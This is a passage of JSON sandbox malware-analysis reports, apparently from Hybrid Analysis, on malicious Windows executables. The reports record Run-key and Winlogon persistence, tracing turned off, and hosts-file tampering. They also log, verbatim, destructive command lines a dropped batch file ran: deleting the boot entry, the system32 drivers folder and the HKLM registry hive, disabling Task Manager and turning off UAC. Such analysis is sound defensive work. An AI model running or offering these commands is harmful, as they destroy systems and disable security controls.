"https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MY PROGRAM\"; Value: \"\\C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\\\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\"; Key: \"SHELL\"; Value: \"C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\LOCAL SETTINGS\\MUICACHE\\137\\52C64B7E\"; Key: \"LANGUAGELIST\"; Value: \"en-US\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-19", "type": 3, "relevance": 10, "name": "Modifies Software Policy Settings", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-30", "type": 3, "relevance": 5, "name": "Modifies file/console tracing settings (often used to hide footprints on system)", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "api-32", "type": 6, "relevance": 10, "name": "Writes to the hosts file", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" wrote 79 bytes to file \"C:\\Windows\\System32\\drivers\\etc\\hosts\": 3132372e302e302e31207777772e646973636f72642e636f6d203132372e302e302e31207777772e676f6f676c652e636f6d203132372e302e302e31207777772e636c61737369637562652e636f6d", "origin": "API Call", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2
https://hybrid-analysis.com/sample/9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2
Hybrid Analysis - Ransomware
{"size": 3101184, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2", "sha256": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2", "av_detect": 89, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 9, "total_signatures": 212, "extracted_files": [{"name": "Antivirus2.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs", "file_size": 3419, "sha256": "dc98a3995c8c9db2897b3dcd603d0a55e9d6b42cb3900f9b5666dbb461172197", "type_tags": ["text"], "description": "ISO-8859 text, with CRLF line terminators", "runtime_process": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe (PID: 5808)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Antivirus3.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs", "file_size": 10312, "sha256": "556700ac50ffa845e5de853498242ee5abb288eb5b8ae1ae12bfdb5746e3b7b1", "type_tags": ["text"], "description": "C source, ASCII text", "runtime_process": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe (PID: 5808)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "KasperskyScanner.hta", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta", "file_size": 6995, "sha256": "1a8083787b336b322510f93d930f52aedeb90d2052501e864bfa5b1906e74d58", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "runtime_process": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe (PID: 5808)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMom.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs", "file_size": 13584, "sha256": "0d2f271fe7d7a6c9252ebf6e99146991d9ad5bfbb3431d380c00419889d392d6", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe (PID: 5808)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMomIsGay.html", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html", "file_size": 5107, "sha256": "390e460334ec801fdeadb511d7404ff2c8b7a0a945a0c763d0b3354e15639dbf", "type_tags": ["html"], "description": "HTML document, ISO-8859 text, with CRLF line terminators", "runtime_process": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe (PID: 5808)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xlsrvintl.dll", "file_path": "%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll", "file_size": 3101184, "sha256": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe (PID: 5808)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services", "file_path": "%WINDIR%\\System32\\drivers\\etc\\services", "file_size": 79, "sha256": "8fd9c10a4641311464f5a6529b4d2b23c5727d44cf735b05336d63fb905c9173", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe (PID: 5808)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Antivirus.bat.bin", "file_size": 169746, "sha256": "baa3bfb404c663a5a813475773b4b4d479ceb8f1cf02dec627591284b959a343", "type_tags": ["script", "bat"], "description": "DOS batch file, ASCII text, with very long lines (844), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "3776.txt", "file_size": 483, "sha256": "0ddd85af4536dfc5535944f964b72bac3c6f0a87ff15d381480d64cb75407157", "type_tags": ["text"], "description": "ASCII text, with very long lines (481), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "21543.txt", "file_size": 482, "sha256": "e591f9c7e0ae6b6075d7f8abae99ee14fc9cb531c72cd5664173cfd67dee3167", "type_tags": ["text"], "description": "ASCII text, with very long lines (480), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "15291.txt", "file_size": 482, "sha256": "f885f783bb087f0cfea703f1c73ff948068d55c39bfbed6271b0836d995938e6", "type_tags": ["text"], "description": "ASCII text, with very long lines (480), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "9553.txt", "file_size": 481, "sha256": "ccb445425be1bea47b073caa2d301f4bba23779195cab7956083cb20c8c92627", "type_tags": ["text"], "description": "ASCII text, with very long lines (479), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "23484.txt", "file_size": 480, "sha256": "cbfc704fd221b6667bf446fec105ab3f9d9d7bbd8e916af509d8b146d06c9c88", "type_tags": ["text"], "description": "ASCII text, with very long lines (478), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "21796.txt", "file_size": 480, "sha256": "d849c4ae601e1c749bff6acfa08b7f0215bf40951cde1d7102c9fbc4c149b3ae", "type_tags": ["text"], "description": "ASCII text, with very long lines (478), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "678.txt", "file_size": 479, "sha256": "e9c484d549214812813082fd545b60b381696a4abf2f3adcbd1329d6404f8df9", "type_tags": ["text"], "description": "ASCII text, with very long lines (477), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "7535.txt", "file_size": 478, "sha256": "6e440d63b30b2c510ab230f7ad9e7e151158a75589d65245a0c51ed0f3684544", "type_tags": ["text"], "description": "ASCII text, with very long lines (476), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "26413.txt", "file_size": 478, "sha256": "a4efa5b3bdbf6a1c65540f0aa8d2f6df76dad1856c7dc6d436fa299d54dbfa7a", "type_tags": ["text"], "description": "ASCII text, with very long lines (476), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "31489.txt", "file_size": 477, "sha256": "bbf95046a95686d5920745182504dd4f3bf6fecf5e703e0273efa25c6cdbe2b2", "type_tags": ["text"], "description": "ASCII text, with very long lines (475), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24799.txt", "file_size": 477, "sha256": "573827104ae15e6c2152812e0557c4d6ea8a364cd144a94370d14572bdd011c9", "type_tags": ["text"], "description": "ASCII text, with very long lines (475), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "1767.txt", "file_size": 477, "sha256": "e222a9735ee362c88b645d17abcae85c4d19a9eb722e079e4ffb00941803215a", "type_tags": ["text"], "description": "ASCII text, with very long lines (475), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "00000000-00005808", "name": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe", "normalized_path": "C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe", "sha256": "9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2"}, {"uid": "00000000-00005288", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005376", "parentuid": "00000000-00005288", "name": "bcdedit.exe", "normalized_path": "%WINDIR%\\system32\\bcdedit.exe", "command_line": "bcdedit /delete {current}", "sha256": "e5bc427ba84627fa84861c54044df8ac3c3b3c3ed3d007265c6b18f588d0ca8a"}, {"uid": "00000000-00005364", "parentuid": "00000000-00005288", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "cmd /c rd %WINDIR%\\system32\\drivers/s/q", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005004", "parentuid": "00000000-00005288", "name": "reg.exe", "normalized_path": "%WINDIR%\\system32\\reg.exe", "command_line": "reg delete \"HKCU\\Control Panel\\Desktop\" /V Wallpaper /f", "sha256": "36414c7e57afa6136d77fd47f4c55102e35f2475fbcd719728da7d14b1590e2a"}, {"uid": "00000000-00005608", "parentuid": "00000000-00005288", "name": "reg.exe", "normalized_path": "%WINDIR%\\system32\\reg.exe", "command_line": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", "sha256": "36414c7e57afa6136d77fd47f4c55102e35f2475fbcd719728da7d14b1590e2a"}, {"uid": "00000000-00005688", "parentuid": "00000000-00005288", "name": "reg.exe", "normalized_path": "%WINDIR%\\system32\\reg.exe", "command_line": "ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", "sha256": "36414c7e57afa6136d77fd47f4c55102e35f2475fbcd719728da7d14b1590e2a"}, {"uid": "00000000-00005500", "parentuid": "00000000-00005288", "name": "rundll32.exe", "normalized_path": "%WINDIR%\\system32\\rundll32.exe", "command_line": "user32.dll,UpdatePerUserSystemParameters", "sha256": "3fa4912eb43fc304652d7b01f118589259861e2d628fa7c86193e54d5f987670"}, {"uid": "00000000-00005524", "parentuid": "00000000-00005288", "name": "reg.exe", "normalized_path": "%WINDIR%\\system32\\reg.exe", "command_line": "reg delete hklm /f", "sha256": "36414c7e57afa6136d77fd47f4c55102e35f2475fbcd719728da7d14b1590e2a"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Domains", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001", "informative_identifiers_count": 2, "parent": {"technique": "Acquire Infrastructure", "attck_id": "T1583", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": 